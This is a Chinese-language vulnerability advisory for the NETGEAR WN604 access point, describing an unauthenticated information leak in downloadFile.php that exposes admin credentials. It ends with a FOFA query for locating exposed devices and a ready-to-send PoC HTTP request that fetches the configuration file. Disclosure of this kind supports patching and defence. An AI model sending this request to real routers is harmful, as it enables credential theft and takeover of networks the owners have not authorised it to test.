0x01 產品簡介
NETGEAR WN604是一款由NETGEAR(網件)公司生產的無線接入器(或無線路由器)提供Wi-Fi保護協議(WPA2-PSK, WPA-PSK),以及有線等效加密(WEP)64位、128位和152位支持,保障網絡安全。同時支持MAC地址認證、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全機制,進一步增強網絡安全性。
0x02 漏洞概述
Netgear WN604 downloadFile.php接口處存在信息泄露漏洞,文件身份驗證的遠程攻擊者可以利用此漏洞獲取無線路由器的管理員賬號密碼信息,導致路由器后臺被控,攻擊者可對無線網絡發起破壞或進一步威脅。
0x03 影響范圍
WN604 <= 20240710版本
0x04 復現環境
FOFA:title=="Netgear"
0x05 漏洞復現
PoC
GET /downloadFile.php?file=config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close